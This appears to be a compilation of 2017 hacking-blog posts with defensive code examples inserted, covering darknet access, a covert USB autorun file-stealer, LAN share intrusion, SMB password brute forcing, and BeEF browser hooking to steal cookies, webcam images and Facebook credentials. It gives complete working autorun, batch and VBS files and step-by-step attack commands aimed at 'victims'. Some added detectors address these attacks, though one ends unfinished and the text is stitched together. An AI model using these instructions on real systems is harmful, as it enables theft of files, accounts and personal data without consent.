Monday, 17 April 2017
How to Access Darknet (darkweb) : The Hidden Anonymous Internet
What is Dark Web?
First you would need to know about Deep Web. Deep web is 99% of the internet that is not accessible using Google. Deep Web includes large libraries, large databases and members-only websites that are not available to the general public. If you have a library network in your college campus or database network in your company that only you can get access to, it is DarkWeb.
Darknet is an overlay network that can only be accessed using specific software, configurations, or authorization. It is part of the Deep Web, because its contents are not accessible through search engines. But it is something more, it is anonymous. It hosts anonymous websites. Yeah, you wouldn’t know who the owner is unless he explicitly reveals his information. It offers full anonymity to users too. Darknet anonymity is usually achieved using an ‘onion network’. I am sure you have cut an onion once in your lifetime and you had been crazy about the number of layers it has; the same happens when you use an onion network. There are a number of encryption layers that hide your true identity.
Uses of Darkweb:
Ok, so you have grasped what Darkweb is. Now you may ask me why you should use it. Well, the reason could be any of them:
1~To better protect the privacy right of citizens from targeted and mass surveillance.
2~Whistleblowing and news leaks
3~Hacking and Computer Crime. (Maybe, you may want to chat with the most dangerous of hackers).
4~Sale of restricted goods.
5~File sharing. etc...
How to Access DARKWEB?
Well, the most popular way to access Darknet is by using TOR browser. Technically, it stands for ‘The Onion Router’ and it is as simple as installing a new browser.
After that you would need a URL or directory that contains URLs to different websites or class of websites so that you know what to type into the browser’s address bar.
You can easily get URLs in Onion Directory of Darkweb at http://am4wuhz3zifexz5u.onion/ or just google for Darkweb Sites.
Just like you have Google, Yahoo, etc. for our widely known Internet, Darknet also has a Search Engine. Some are Torch, Duck Duck Go, etc.
If you want to access Darknet from your pretty phone, you can use ORBOT (Free).
I think you wanna explore Darknet yourself, so I would leave you here. Just a piece of advice: it is used for all things legal or illegal. So just make sure you verify the links you click.
NOTE: Make sure you use TOR Browser.
Sunday, 16 April 2017
How to copy (steal) files from a computer to a pendrive (Latest VIRUS)
Hello guys, have you ever wanted something from your friend's PC that he is not giving you, like games, movies, important files, etc.? Here I come with a cool trick: just plug your USB flash drive into his PC to automatically copy his files to your pen drive, secretly and silently. Copy the files you brought to his PC to complete the act.
Sneaky, isn’t it? So let us prepare such a sinister USB Flash drive.
Open Notepad (I recommend Notepad++) and copy-paste the following lines.
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
Save this as autorun.inf
The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it look like a game or something.
The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.
The “shell\open\command=” line also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.
Open Notepad again and copy-paste the following lines
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls
Save this as file.bat
This file is configured to copy the contents of the current user's pictures, favorites, and videos folders to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.
The first file path “%USERPROFILE%\pictures” – is the target.
The second file path “%drive%\all\My pics” – is the destination.
Open Notepad once again and copy-paste the following line.
CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False
Save this as invisible.vbs
This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.
Open Notepad one last time and copy-paste the following line.
wscript.exe \invisible.vbs file.bat
Save this as launch.bat
This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.
Copy all 4 files created in the above steps and put them in the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.
This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly.
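For triage of a suspect flash drive, the added example below (not code from the original post) parses autorun.inf, follows the files it launches, and flags the two behaviours this post relies on: a bulk copy out of the user profile and a script started with a hidden window. The patterns, function names and sample drive contents are assumptions constructed for illustration; note that Windows 7 and later ignore the open= and shell\...\command= keys on USB flash drives.

```python
import re

# autorun.inf keys that name something to start when the drive is opened
LAUNCH_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$", re.I)
SCRIPT_EXT = re.compile(r"\.(bat|cmd|vbs|vbe|js|jse|wsf|ps1)\b", re.I)
# Content heuristics (assumptions chosen for this example, not a complete rule set)
COPY_TOOL = re.compile(r"\b(xcopy|robocopy)\b", re.I)
PROFILE_VAR = re.compile(r"%(USERPROFILE|APPDATA|HOMEPATH)%", re.I)
HIDDEN_RUN = re.compile(r"\.Run\b[^\n]*,\s*0\s*(,|$)", re.I | re.M)  # WScript.Shell.Run cmd, 0


def parse_autorun(text):
    """Return {key: value} from the [autorun] section; keys are lower-cased."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def audit_drive(files):
    """files maps file name -> text for the drive root. Returns (file, finding) pairs."""
    by_name = {name.lower(): text for name, text in files.items()}
    findings, queue, seen = [], [], set()
    for key, cmd in parse_autorun(by_name.get("autorun.inf", "")).items():
        if LAUNCH_KEY.match(key):
            kind = "script" if SCRIPT_EXT.search(cmd) else "program"
            findings.append(("autorun.inf", f"{key} launches {kind}: {cmd}"))
            queue.append(cmd)
    # Follow the chain: every file named by a launched command or script is inspected too.
    while queue:
        text = queue.pop().lower()
        for name, body in by_name.items():
            if name == "autorun.inf" or name in seen or name not in text:
                continue
            seen.add(name)
            if COPY_TOOL.search(body) and PROFILE_VAR.search(body):
                findings.append((name, "bulk copy out of the user profile"))
            if HIDDEN_RUN.search(body):
                findings.append((name, "starts a command with a hidden window"))
            queue.append(body)
    return findings


# Constructed sample mirroring the file layout described in this post.
SAMPLE_DRIVE = {
    "autorun.inf": "[autorun]\nicon=drive.ico\nopen=launch.bat\n"
                   "action=Click OK to Run\nshell\\open\\command=launch.bat\n",
    "launch.bat": "wscript.exe \\invisible.vbs file.bat\n",
    "invisible.vbs": 'CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False\n',
    "file.bat": 'set backupcmd=xcopy /s /c /d /e /h /i /r /y\n'
                '%backupcmd% "%USERPROFILE%\\pictures" "%drive%\\all\\My pics"\n',
}

if __name__ == "__main__":
    for name, finding in audit_drive(SAMPLE_DRIVE):
        print(f"{name}: {finding}")
```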
Friday, 14 April 2017
Hack Into A Computer Which Is Connected On The Same Network (LAN)
Step 1:- Finding the Target
Step 2:- Trial and error.
Step 3:- Gathering the information
Step 4:- Getting In.
Finding the Target
So first off we need to find a computer or the computer to hack into. So if you're plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built-in sniffer feature. A sniffer looks for all IP addresses in the local subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross.
Another window will pop up, make sure “All host in my subnet” is selected, and then click ok.
It should begin to scan.
Then IPs, computer names, and MAC addresses will show up.
Now remember the IP address of the computer you are going to be breaking into.
If you can’t tell whether the IP address is a computer, router, modem, etc., that’s ok.
During the next step we will begin our trial and error.
Now, we don’t know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN.
If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on.
Click on the start menu and go to run, type in cmd, and click ok.
This should bring up the command prompt.
From here we will do most of the hacking.
Now I will be referring to certain commands that need to be inputted into the command prompt.
I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt.
I am only doing this to avoid confusion.
Let’s get back to the hacking.
Type in “ping (IP address of the target).” For example in this tutorial, “ping 192.168.1.103.”
This will tell us if the target is online.
If it worked, it will look something like this (note, I have colored out private information):
If it didn’t work, meaning that the target is not online, it will look something like this:
If the target is not online, either switch to a different target, or try another time.
If the target is online, then we can proceed.
Now, input this command “nbtstat -a (IP address of target).” An example would be “nbtstat -a 192.168.1.103.”
This will show us if there is file sharing enabled, and if there is, it will give us the currently logged on user, workgroup, and computer name.
Finally it’s time.
By now we know: that our target is online, our target has file sharing, and our target’s computer name.
So it’s time to break in.
We will now locate the shared drives, folders, files, or printers. Type in “net view (IP Address of Target)”
An example for this tutorial would be: “net view 192.168.1.103”
We have just found our share name. In this case, under the share name is “C,” meaning that the only shared thing on the computer is C. Then to the right, under Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C DISK can sometimes be an entire person’s hard drive.
As you can see, for my hack I have already used “K,” so I used “G” instead.
You may also do the same for multiple hacks.
If it worked, it will say “The command completed successfully.”
If not, you will have to go retrace your steps.
Now open up “my computer” under the start menu, and your newly created network drive should be there.
Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive.
The drive will not be deleted after you disconnect though, but you won’t be able to access it until you reconnect to the network.
So if you are doing this for the content of the drive, I recommend dragging the files and folders inside of the drive onto your computer, because you never know if the target changes the sharing setting.
Congratulations! You’re DONE!
-Commands used in this tutorial:
PING
NBTSTAT -a (IP Address of Target)
NET VIEW (IP Address of Target)
NET USE K: (IP Address of Target)(SHARENAME)
-Program used in this tutorial:
Cain and Abel.
Tuesday, 4 April 2017
HACK OLD PC n LAPTOP PASSWORD EASILY BY KALI LINUX
Sometimes you need a password to gain access to an older running Windows system. Maybe it's a machine in your basement you forgot about or a locked machine that belonged to a disgruntled employee. Maybe you just want to try out your pentesting skills.
When you need to access a running Windows system, you can use a dictionary attack tool like ACCCHECK to brute-force the admin's username and password as long as it's an older Windows system (XP and earlier, possibly Windows 7).
Acccheck looks at Windows SMB protocol authentication, specifically the administrator account, and works over the network. Of course, if you have physical access to your machine, there are other ways to get the password, but if not, ACCCHECK is a good tool. And best of all, it's built right into Kali.
Starting Acccheck
Acccheck is included in Kali, so fire up a terminal and start the tool with:
acccheck
Testing for the Default Username & Password
It will tell you a couple different ways to run the script, but you can run it straight away using the following basic syntax, where -t indicates a single host, and IP ADDRESS is the host IP of a Windows machine.
acccheck -t IP ADDRESS
That command will scan the IP address with the default "administrator" username and a blank password. It might not work, but you never know until you try!
Testing a Suspected Username & Password
If you were really, really lucky, you got into the Windows computer in question already. If not, you'll have to get a little more detailed with your hack. We can be a little more thorough running the acccheck command with a few more parameters, such as:
acccheck -t IP ADDRESS -u USERNAME -p PASSWORD
In this command, -t is single host request, IP ADDRESS is your target Windows machine, -u USERNAME is the username you want to try, and -p PASSWORD is the password you think will work. Below, I'm trying "admin" and "password123" on the same machine.
If acccheck has success logging in, it creates a file called "cracked" in your working directory upon completion. After I tried a few more username and password combinations, I saw this file:
Investigating the file, I can see the IP, username, and password that worked for me. If you get on my network, you might get into 10.0.2.15 with amuck/bluesky123 as you can see below.
Using Kali's Username & Password Lists
So now let's check out what more we can have acccheck do. Because it's a password cracker, acccheck accepts dictionaries, as well as any list of usernames you might have. On Kali, we can point at the stock dictionaries and username files, which are relatively large, and see if we have success. Below are the locations for these files.
=>/usr/share/dirb/wordlists/big.txt (dictionary file)
=>/usr/share/dirb/wordlists/others/names.txt (username file)
And this time, because you have more than one password and username to try, the syntax is a bit different—you'll need an uppercase -P and -U, which tells acccheck to search the passwords and usernames in the files. All together, this longer command is:
=>acccheck -t 10.0.2.15 -U /usr/share/dirb/wordlists/others/names.txt -P /usr/share/dirb/wordlists/big.txt
To reiterate, the uppercase letters are needed because we're calling files this time, not just words. And don't forget to use your own target IP address!
Danger: Running the command above will take a long time. The big.txt file is indeed big, and acccheck is checking all of the usernames you selected against all of the passwords, making this task very intensive! In the image above, produced when I ran the "top" command, you can see acccheck running, and it remained running for hours before I stopped it! (I eventually ran kill 19959 in a terminal, since I ran it against a VERY strong password.)
Using Your Own Username & Password Lists
Acccheck can use more than the default username and password list included in Kali—we can use our own dictionary file, and our own list of usernames, too.
Here, I've used a popular dictionary file along with a standard list of Windows admin usernames as my password field (just admin, Admin, administrator, and Administrator). The same uppercase -P, and -U apply, because I'm calling files and not just passing individual words. My command is a lot shorter this time, however, because my files are located in the working directory:
=>acccheck -t 10.0.2.15 -U mynames.txt -P mypasswords.txt
If you've had success running acccheck against a Windows machine and it generated a valid cracked file, you should consider renaming the cracked file with a logical name, possibly including the IP address, to keep things straight moving forward. Here, I renamed my successful cracked file for 10.0.2.15 to something I will recognize in the future (cracked-10-0-2-15):
Checking a List of IP Addresses
To get really aggressive, you can use an uppercase -T in your command to run acccheck against a range of IP addresses, not just one target IP address. I won't get into that here, but those files work the same as usernames and passwords, so get creative.
And as with many similar Windows exploits, pre-scanning your target IP to look for vulnerable ports is always a good idea, and Nmap is a good way to do just that.
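Seen from the target, a dictionary run like the ones above is a burst of failed SMB network logons from one address. The added example below (not part of the original post or of acccheck) flags such a burst and any successful logon that follows it; the record layout, thresholds, source addresses and sample lines are constructed, with event IDs 4625/4624 and logon type 3 as recorded by Windows Vista and later.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta


def sample_lines():
    """Constructed records: 'timestamp event_id logon_type source_ip account'.

    This is a simplified layout for the example, not a real event log export.
    """
    start = datetime(2017, 4, 4, 10, 0, 0)
    names = ["admin", "Admin", "administrator", "Administrator"]
    lines = []
    # Twelve failed network logons in 24 seconds from one source, cycling usernames.
    for i in range(12):
        stamp = (start + timedelta(seconds=2 * i)).isoformat()
        lines.append(f"{stamp} 4625 3 10.0.2.4 {names[i % 4]}")
    # One of the guesses finally works.
    lines.append(f"{(start + timedelta(seconds=30)).isoformat()} 4624 3 10.0.2.4 amuck")
    # A legitimate user who mistypes a password twice, then gets it right.
    later = start + timedelta(minutes=10)
    lines.append(f"{later.isoformat()} 4625 3 10.0.2.30 jsmith")
    lines.append(f"{(later + timedelta(seconds=8)).isoformat()} 4625 3 10.0.2.30 jsmith")
    lines.append(f"{(later + timedelta(seconds=20)).isoformat()} 4624 3 10.0.2.30 jsmith")
    return lines


def detect_guessing(lines, window=timedelta(minutes=5), max_failures=10):
    """Return alerts as (kind, source_ip, detail) tuples; lines must be in time order."""
    recent = defaultdict(deque)   # source -> timestamps of failures still inside the window
    accounts = defaultdict(set)   # source -> account names it has failed against
    flagged, alerts = set(), []
    for line in lines:
        stamp, event_id, logon_type, src, user = line.split()
        if logon_type != "3":     # only network logons (SMB) are of interest here
            continue
        ts = datetime.fromisoformat(stamp)
        failures = recent[src]
        while failures and ts - failures[0] > window:
            failures.popleft()    # forget failures that fell out of the window
        if event_id == "4625":
            failures.append(ts)
            accounts[src].add(user)
            if len(failures) >= max_failures and src not in flagged:
                flagged.add(src)
                detail = f"{len(failures)} failures across {len(accounts[src])} accounts"
                alerts.append(("guessing", src, detail))
        elif event_id == "4624" and src in flagged and failures:
            # A success right after a burst means a guessed credential: reset it.
            alerts.append(("success-after-guessing", src, user))
    return alerts


if __name__ == "__main__":
    for alert in detect_guessing(sample_lines()):
        print(alert)
```

An account lockout policy and disabling blank-password and default administrator accounts remove the cases this post depends on; the detector covers what is left.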
Friday, 3 March 2017
How to Hack Web Browsers with BeEF...through Kali Linux
Welcome back to MyAiM's Hacker...
I had promised a new series on hacking web applications, mobile devices, and even Facebook here on AiM Trick's and I intend to deliver you those sometime this year. In each of those topics, I will introduce you to new hacking tools and techniques, though, one tool that we will be using in all of those areas is called the Browser Exploitation Framework, or BeEF (don't ask me what the lowercase "e" stands for).
Similar to Metasploit, BeEF is a framework for launching attacks. Unlike Metasploit, it is specific to launching attacks against web browsers. In some cases, we will be able to use BeEF in conjunction with Metasploit to launch particular attacks, so I think it's time for us to become familiar with it.
BeEF was developed by a group of developers led by WADE ALCORN. Built on the familiar Ruby on Rails platform, BeEF was developed to explore the vulnerabilities in browsers and test them. In particular, BeEF is an excellent platform for testing a browser's vulnerability to cross-site scripting (XSS) and other injection attacks.
STEP=>1
*Start Cooking BeEF
BeEF is built into Kali Linux, and it can be started as a service and accessed via a web browser on your localhost. So let's start by firing up Kali and cooking a bit of BeEF. Start the BeEF service by going to "Applications" -> "Kali Linux" -> "System Services" -> "BeEF" -> "beef start."
STEP=>2
*Opening a Browser to BeEF
The BeEF server can be accessed via any browser on our localhost (127.0.0.1) web server at port 3000. To access its authentication page, go to:
http://localhost:3000/ui/authentication
The default credentials are "beef" for both username and password.
Great! Now you have successfully logged into BeEF and are ready to begin using this powerful platform to hack web browsers.
Note in the screenshot below that my local browser, 127.0.0.1, appears in the left hand "Hooked Browsers" explorer after I clicked on the link to the demo page. BeEF also displays its "Getting Started" window to the right.
STEP=>3
*Viewing Browser Details
If I click on the local browser, it will provide more choices to the right including a "Details" window where we can get all the particulars of that browser. Since I am using the Iceweasel browser built into Kali, which is built upon Firefox, it shows me that the browser is Firefox.
It also shows me the version number (24), the platform (Linux i686), any components (Flash, web sockets, etc.), and more information that we will be able to use in later web application hacks.
STEP=>4
*Hooking a Browser
The key to success with BeEF is to "hook" a browser. This basically means that we need the victim to visit a vulnerable web app. This injected code in the "hooked" browser then responds to commands from the BeEF server. From there, we can do a number of malicious things on the victim's computer.
BeEF has a JavaScript file called "hook.js," and if we can get the victim to execute it in a vulnerable web app, we will hook their browser! In future tutorials, we will look at multiple ways to get the victim's browser hooked.
In the screenshot below, I have "hooked" an Internet Explorer 6 browser on an old Windows XP on my LAN at IP 192.168.89.191.
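On the defending side, a Content-Security-Policy that restricts script sources stops a page from loading an injected hook.js from a foreign server. The added example below (not from the original post or from BeEF) checks which script elements of a page a given policy would allow, using a simplified matcher; the page, the policy and the injected tag pointing at port 3000 on a documentation address are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

DEFAULT_PORT = {"http": 80, "https": 443}


class ScriptCollector(HTMLParser):
    """Collect the src of every <script> element (None for inline scripts)."""
    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts.append(dict(attrs).get("src"))


def origin(url):
    parts = urlsplit(url)
    return parts.scheme, parts.hostname, parts.port or DEFAULT_PORT.get(parts.scheme)


def script_sources(policy):
    """Source list of script-src, falling back to default-src; None if neither is set."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives.setdefault(tokens[0].lower(), tokens[1:])
    return directives.get("script-src", directives.get("default-src"))


def host_source_matches(source, url, page_url):
    """Match scheme, host (with leading *. wildcard) and port; paths are not modelled."""
    if "://" not in source:
        source = f"{urlsplit(page_url).scheme}://{source}"
    s_scheme, s_host, s_port = origin(source)
    scheme, host, port = origin(url)
    if not s_host or not host or s_scheme != scheme or s_port != port:
        return False
    if s_host.startswith("*."):
        return host.endswith(s_host[1:])
    return host == s_host


def external_allowed(url, page_url, sources):
    for source in (s.lower() for s in sources):
        if source == "'self'":
            if origin(url) == origin(page_url):
                return True
        elif source.startswith("'"):
            continue                      # nonces, hashes, 'none': not modelled here
        elif source == "*":
            return True
        elif source.endswith(":"):        # scheme-source such as https:
            if source[:-1] == urlsplit(url).scheme:
                return True
        elif host_source_matches(source, url, page_url):
            return True
    return False


def audit_scripts(html, page_url, policy):
    """Return [(script URL or '<inline>', allowed)] for each <script> in the page."""
    sources = script_sources(policy)
    collector = ScriptCollector()
    collector.feed(html)
    results = []
    for src in collector.scripts:
        url = urljoin(page_url, src) if src else None
        if sources is None:
            allowed = True                # no policy: the browser loads everything
        elif url is None:
            allowed = "'unsafe-inline'" in [s.lower() for s in sources]
        else:
            allowed = external_allowed(url, page_url, sources)
        results.append((url or "<inline>", allowed))
    return results


# Constructed page: two legitimate scripts, one injected hook tag, one injected inline script.
PAGE_URL = "https://shop.example/cart"
SAMPLE_HTML = """<html><body>
<script src="/static/app.js"></script>
<script src="https://cdn.example/lib.js"></script>
<script src="http://192.0.2.10:3000/hook.js"></script>
<script>document.title = "injected"</script>
</body></html>"""
POLICY = "default-src 'none'; script-src 'self' https://cdn.example"
```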
STEP=>5
*Running Commands in the Browser
Now that we have hooked the victim's browser, we can use numerous built-in commands that can be executed from the victim's browser. Below are just a few examples; there are many others.
☣Get Visited Domains
☣Get Visited URLs
☣Webcam
☣Get All Cookies
☣Grab Google Contacts
☣Screenshot
In the screenshot below, I selected the "Webcam" command that many of you may be interested in. As you can see, when I execute this command, an Adobe Flash dialog box will pop up on the screen of the user asking, "Allow Webcam?" If they click "Allow," it will begin to return pictures from the victim's machine to you.
Of course, the text can be customized, so be imaginative. For instance, you could customize the button to say "You have just won the lottery! Click here to collect your winnings!" or "Your software is out of date. Click here to update and keep your computer secure." Other such messages might entice the victim to click on the box.
STEP=>6
*Getting Cookies
Once we have the browser hooked, there are almost unlimited possibilities of what we can do. If we wanted the cookies of the victim, we can go to "Chrome Extensions" and select "Get All Cookies" as shown in the screenshot below.
When we click on the "Execute" button to the bottom right, it will begin collecting all the cookies from the browser. Obviously, once you have the user's cookies, you are likely to have access to their websites as well.
BeEF is an extraordinary and powerful tool for exploiting web browsers. In addition to what I have shown you here, it can also be used to leverage operating system attacks. We will be using it and other tools in my new series on hacking web applications, mobile devices, and Facebook, so keep coming back to AiM Trick's...
Sunday, 26 February 2017
How to Find the Exact Location of Any IP Address
Welcome back to MyAiM's Hacker !
Have you ever wondered where the physical location of an IP address is? Maybe you want to know if that proxy server you are using is actually out of your local legal jurisdiction. Or, maybe you have the IP address of someone you are corresponding with and want to make certain they are where they say they are. Or, maybe you are a forensic investigator tracking down a suspect who wrote a threatening email or hacked someone's company.
Now you can find the location of that IP address without a subpoena or search warrant.
A company called MaxMind maintains a database of the location of every IP address on the planet complete with GPS coordinates, area code, zip code, and country.
This database is not in a typical relational database format, but rather in a flat file. MaxMind charges a $370 site license and $90/month (or $1360/year) for updates to this database. Their software has a beautiful front end that makes querying the database easy enough that even Windows or Mac users can manage.
MaxMind also gives away a free developers version of this database without any software or tools to read it. Although slightly less accurate than the commercial version, the price is certainly right. All we need to find the location of the IP is a program to read this data.
Two programmers, Jennifer Ennis and T. Williams, have developed a small Python script called pygeoip and released it under the GPL license that enables us to input an IP address and output this critical information.
Fire Up Kali & Open a Terminal
The first step, of course, is to fire up our trusty Kali system, or in this case, any Linux distribution. Then, open a terminal.
Note: Be cautious of the formatting below for commands. The formatting of this article will create big space gaps since it stretches lines out to fit the margins. This is because of long URLs that try to fit themselves on a separate line. Large spaces equals just one space, so keep that in mind. Refer to the screenshots to see how they actually look.
Download the Database
Now we need to download the database from MaxMind, and we can get it by typing the following.
kali > wget -N -q http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
Then we need to unzip it.
kali > gzip -d GeoLiteCity.dat.gz
Let's now check that the database is in place by listing the directory.
kali > ls -alh GeoLiteCity.dat
Download & Install Pygeoip
Next, we need to install the Python script to read the database, pygeoip. We can download it by typing the following.
kali > wget http://pygeoip.googlecode.com/files/pygeoip-0.1.3.zip
Then, unzip it.
kali > unzip pygeoip-0.1.3.zip
We next need to download some setup tools into the pygeoip directory.
kali > cd /pygeoip-0.1.3
kali > wget http://svn.python.org/projects/sandbox/trunk/setuptools/ez_setup.py
kali > wget http://pypi.python.org/packages/2.5/s/setuptools-0.6c11-py2.5.egg
Let's now move and then build and install the setup tools.
kali > mv setuptools-0.6c11-py2.5.egg setuptools-0.7a1-py2.5.egg
kali > python setup.py build
kali > python setup.py install
We need to move the database to the pygeoip directory so that script can access it without having to use the full path.
kali > mv GeoLiteCity.dat /pygeoip-0.1.3/GeoLiteCity.dat
Query the Database
Now that we have the database in place and the pygeoip script downloaded and installed, we can begin to query that database with pygeoip.
First, we need to start a Python shell.
kali > python
Then, you will be greeted with the triple >>> indicating you are now in an interactive python shell. Let's import the module and instantiate the class.
>>> import pygeoip
>>> gip = pygeoip.GeoIP('GeoLiteCity.dat')
Next, we are ready to begin our query. Let's see where Google is located.
>>> rec = gip.record_by_addr('64.233.161.99')
>>> for key, val in rec.items():
...     print "%s: %s" % (key, val)
...
Please note that it is critical to indent the "print". If not, you will throw an error.
As you can see, we were able to locate Google's IP in Mountain View, CA at area code 650, postal code 94043, longitude -122.0574, and latitude 37.4192. Not bad! Now, let's try to locate the IP of cnn.com.
Once again, the combination of the database and pygeoip script was able to provide us with key location information on CNN's IP address.
This little tool is great for locating any IP address in the world, albeit, it is a bit clunky. Maybe someone here in the Null Byte community with good Python skills would like to write an interactive script with a nice user interface where the user can simply enter the IP and get the record information?
Keep coming back to MyAiM's Community, as we continue to explore the tools and techniques of hacking!
Sunday, 19 February 2017
How to Get Facebook Credentials Without Hacking Facebook
Welcome back to
Many people come to Aim Tricks looking to hack Facebook without the requisite skills to do so. Facebook is far from unhackable, but to do so, you will need some skills, and skill development is what AiM Tricks is all about.
Sometimes, if you have a bit of skill, a bit of luck, and a bit of social engineering, you can get Facebook credentials. That's what this tutorial is all about. If you don't take the time to install Kali and learn a little about networking and Linux, this won't work for you—but if you are willing to take a little time to study here at AiM Tricks, you can probably gain access to someone's Facebook credentials very easily with this little trick.
STEP>1
INSTALL KALI LINUX IN YOUR PC
The first step is to download and install Kali Linux. This can be done as a standalone operating system, a dual-boot with your Windows or Mac system, or in a virtual machine inside the operating system of your choice. No, this cannot be done with Windows! Windows, for all its strengths and ease of use, is not an appropriate hacking operating system.
Within Kali, there is an app called the Browser Exploitation Framework (BeEF). It is capable of helping you hack the victim's browser and take control of it. Once you have control of their browser, there are so many things you can do. One of them is to trick the user into giving away their Facebook credentials, which I'll show you here.
STEP>2
OPEN BEEF
Fire up Kali, and you should be greeted with a screen like below. You start up BeEF by clicking on the cow icon to the left of the Kali desktop.
When you click on it, it starts BeEF by opening a terminal.
BeEF is an application that runs in the background on a web server on your system that you access from a browser. Once BeEF is up and running, open your IceWeasel browser to access its interface. You can login to BeEF by using the username beef and the password beef.
You will then be greeted by BeEF's "Getting Started" screen.
STEP>3
HOOK THE VICTIM'S BROWSER
This is the most critical—maybe even the most difficult part—of this hack. You must get the victim to click on a specially designed JavaScript link to "hook" their browser. This can be done in innumerable ways.
The simplest way is to simply embed the code into your website and entice the user to click on it. Use your imagination.
The script looks something like below. Embed it into a webpage, and when someone clicks on it, you own their browser! (Comment below if you have any questions on this; You might also use the MitMf to send the code to the user, but this requires more skill.)
From here, I will be assuming you have "hooked" the victim's browser and are ready to own it.
STEP>4
SEND A DIALOG BOX TO THE USER
When you have hooked the victim's browser, its IP address, along with the operating system and browser type icons, will appear in the "Hooked Browsers" panel on the left. Here, I have simply used my own browser to demonstrate.
If we click on the hooked browser, it opens a BeEF interface on the right side. Notice that it gives us the details of the browser initially. It also provides us with a number of tabs. For our purposes here, we are interested in the "Commands" tab.
Click on the "Commands" tab, then scroll down the "Modules Tree" until you come to "Social Engineering" and click to expand it. It will display numerous social engineering modules. Click on "Pretty Theft," which will open a "Module Results History" and "Pretty Theft" window.
This module enables you to send a pop-up window in the user's browser. In our case, we will be using the Facebook dialog box.
If we click on the "Dialog Type" box, we can see that this module can not only create a Facebook dialog box, but also a LinkedIn, Windows, YouTube, Yammer, and a generic dialog box. Select the Facebook dialog type, then click on the "Execute" button at the bottom.
STEP>5
THE DIALOG BOX APPEARS ON THE TARGET SYSTEM
When you click "Execute" in BeEF, a dialog box will appear in the victim's browser like that below. It tells the victim that their Facebook session has expired and they need to re-enter their credentials.
Although you may be suspicious of such a pop-up box, most users will trust that their Facebook session expired and will simply enter their email and password in.
STEP>6
HARVEST THE CREDENTIALS
Back on our system in the BeEF interface, we can see that the credentials appear in the "Command results" window. The victim has entered their email address "loveofmylife@gmail.com" and their password "sweetbippy" and they have been captured and presented to you in BeEF.
If you are really determined to get those Facebook credentials, it can most definitely be done, and this is just one way of many methods (but probably the simplest).
If you want to develop the skills to an even higher level, start studying here at Null Byte to master the most valuable skill set of the 21st century—hacking!